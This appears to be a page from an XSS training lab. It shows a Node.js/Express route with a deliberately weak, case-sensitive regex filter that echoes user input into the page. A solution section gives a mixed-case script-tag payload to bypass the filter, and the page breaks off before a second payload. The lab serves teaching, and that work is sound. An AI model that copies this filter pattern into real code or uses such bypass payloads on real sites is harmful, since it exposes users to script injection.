Advance XSS Lab by @touhidshaikh22

Level 1: Filter Evasion

MISSION: Bypass the server-side regex filter.

Welcome, Guest

/// SOURCE CODE INSPECTOR ///


// Backend Node.js / Express Route
app.get('/level1', (req, res) => {
    let payload = req.query.payload;
    
    // Developer's attempt at a custom WAF
    payload = payload.replace(/<script>/g, '');
    payload = payload.replace(/onerror=/g, '');
    
    // Output directly to DOM
    res.send("<div id='output'>" + payload + "</div>");
});

[?] DECRYPT CLASSIFIED INTEL (SOLUTION)

/// DECRYPTION COMPLETE ///

The WAF uses a case-sensitive regex for <script> and looks strictly for onerror=. HTML tags are case-insensitive, and there are many other event handlers.

Payload 1 (Case Evasion):

<ScRiPt>alert(1)</ScRiPt>

Payload 2 (Alternate Event Handler):

[ADVANCE XSS LAB]

Level 1: Filter Evasion

/// DECRYPTION COMPLETE ///